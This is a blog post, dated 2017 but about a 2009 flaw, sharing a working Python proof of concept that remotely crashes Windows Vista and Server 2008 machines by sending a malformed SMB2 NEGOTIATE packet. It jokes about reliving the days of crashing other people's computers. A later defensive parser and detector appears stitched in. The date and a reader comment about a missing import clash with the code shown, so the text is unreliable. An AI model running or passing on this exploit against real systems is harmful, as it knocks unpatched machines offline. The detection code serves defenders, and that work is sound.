Monday , 1 May 2017

Good times again with Remote BSOD

Remember the good old days when you could teardrop someone on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for a limited time only, we can relive that experience until Microsoft releases a security patch. This affects all Windows Vista and Windows 7 machines, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they release a security patch before Windows 7 officially launches.

Here’s the proof of concept. I’m going to keep a copy here just in case.

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
b"\x00\x00\x00\x90" # Begin SMB header: Session message
b"\xff\x53\x4d\x42" # Server Component: SMB
b"\x72\x00\x00\x00" # Negotiate Protocol
b"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
b"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
b"\x30\x30\x32\x00"
)
s = socket()

s.connect(host)
s.send(buff)
s.close()

To keep your computer from BSODing for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.
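For anyone watching port 445 traffic rather than disabling SMB 2.0, the packet above is easy to recognise: it is an SMB1 NEGOTIATE request whose "Process ID High" header field is non-zero while the dialect list offers "SMB 2.002". The following parser and check are an added example written for this post, not code from the original PoC or from Microsoft. It decodes the NetBIOS session framing and the 32-byte SMB header, pulls out the dialect strings, and flags the pattern the post describes. `sample_frame` rebuilds the PoC's bytes as constructed test input (only the PID High value varies) so the detector can be exercised offline; nothing here opens a socket.

```python
import struct

# SMB1 command code of the NEGOTIATE request seen in the page's packet
SMB_COM_NEGOTIATE = 0x72
SMB_MAGIC = b"\xffSMB"

# Dialect strings advertised by the page's packet; the last one is what makes
# the Vista / Server 2008 SMB2 code path handle the request.
PAGE_DIALECTS = [
    "PC NETWORK PROGRAM 1.0",
    "LANMAN1.0",
    "Windows for Workgroups 3.1a",
    "LM1.2X002",
    "LANMAN2.1",
    "NT LM 0.12",
    "SMB 2.002",
]


def sample_frame(pid_high: int) -> bytes:
    """Constructed test input: the page's NEGOTIATE request with a chosen
    Process ID High. 0x2600 reproduces the page's bytes 00 26; 0 is normal."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in PAGE_DIALECTS)
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        SMB_MAGIC,          # protocol id
        SMB_COM_NEGOTIATE,  # command
        0,                  # NT status
        0x18,               # flags
        0xC853,             # flags2 (bytes 53 c8 on the wire)
        pid_high,           # Process ID High
        b"\x00" * 8,        # security signature
        0,                  # reserved
        0xFFFF,             # TID
        0xFEFF,             # PID low (bytes ff fe on the wire)
        0,                  # UID
        0,                  # MID
    )
    body = header + bytes([0]) + struct.pack("<H", len(data)) + data  # WordCount 0
    # NetBIOS session message: type 0x00 followed by a 3-byte big-endian length
    return b"\x00" + len(body).to_bytes(3, "big") + body


def parse_smb1_negotiate(frame: bytes) -> dict:
    """Decode a NetBIOS-framed SMB1 NEGOTIATE request into header fields and
    dialect list. Framing errors raise ValueError so they can be logged apart."""
    if len(frame) < 4 + 32 + 3:
        raise ValueError("frame too short for NetBIOS + SMB header")
    if frame[0] != 0 or int.from_bytes(frame[1:4], "big") != len(frame) - 4:
        raise ValueError("NetBIOS session length does not match payload")
    (proto, command, _status, flags, flags2, pid_high, _sig, _res,
     tid, pid_low, uid, mid) = struct.unpack("<4sBIBHH8sHHHHH", frame[4:36])
    if proto != SMB_MAGIC:
        raise ValueError("not an SMB1 header")
    if command != SMB_COM_NEGOTIATE:
        raise ValueError("not a NEGOTIATE request (command 0x%02x)" % command)
    word_count = frame[36]
    bc_off = 37 + 2 * word_count
    if len(frame) < bc_off + 2:
        raise ValueError("frame truncated inside parameter block")
    byte_count = struct.unpack_from("<H", frame, bc_off)[0]
    data = frame[bc_off + 2:]
    if len(data) != byte_count:
        raise ValueError("ByteCount %d does not match %d data bytes" % (byte_count, len(data)))
    # Each dialect entry is a 0x02 buffer-format byte followed by a NUL-terminated string
    dialects, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:
            raise ValueError("dialect entry at offset %d lacks 0x02 format byte" % pos)
        end = data.index(b"\x00", pos + 1)  # ValueError if unterminated
        dialects.append(data[pos + 1:end].decode("ascii"))
        pos = end + 1
    return {"command": command, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "pid_low": pid_low, "tid": tid,
            "uid": uid, "mid": mid, "dialects": dialects}


def check_negotiate(fields: dict) -> list:
    """Reasons this request matches the malformed pattern from the post:
    non-zero Process ID High, made worse when an SMB2 dialect is offered."""
    reasons = []
    if fields["pid_high"] != 0:
        reasons.append("Process ID High is 0x%04x, expected 0x0000" % fields["pid_high"])
        if any(d.startswith("SMB 2.") for d in fields["dialects"]):
            reasons.append("request also offers an SMB2 dialect, so SMB2 parses this header")
    return reasons


if __name__ == "__main__":
    for pid_high in (0x2600, 0):
        fields = parse_smb1_negotiate(sample_frame(pid_high))
        print("PID High 0x%04x -> %s" % (pid_high, check_negotiate(fields) or ["clean"]))
```

The same parser can be pointed at frames captured from the wire; a frame that raises `ValueError` is malformed in a different way and worth logging on its own.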

Ah! The good old days again.

== Update ==

Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.

Original Post: Microsoft Security Advisory 975497 Released

== End Update ==

Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

About Justin Lee

2 comments

  1. The code does not work. The author has forgotten to add:
    from socket import socket
    Importing sleep is redundant, as it is not used in the code. I have made some minor changes and published it on http://bit.ly/Zf7P5.

    Unfortunately, I do not have a Vista/7 machine to try out the code. Have you tried it yet?

  2. @Hongster: No, the author didn’t forget to add
    from socket import socket
    Probably Justin missed copying that line from the original article here.
    http://seclists.org/fulldisclosure/2009/Sep/39

    As for the sleep, it was used during his fuzzing, as I feel he didn’t want to flood it.

    The code does work.

    @Justin: There is another SMB bug in Win 7 and Win 2008 R2 discussed here.
    http://seclists.org/fulldisclosure/2009/Nov/134

    Have Fun.
    🙂
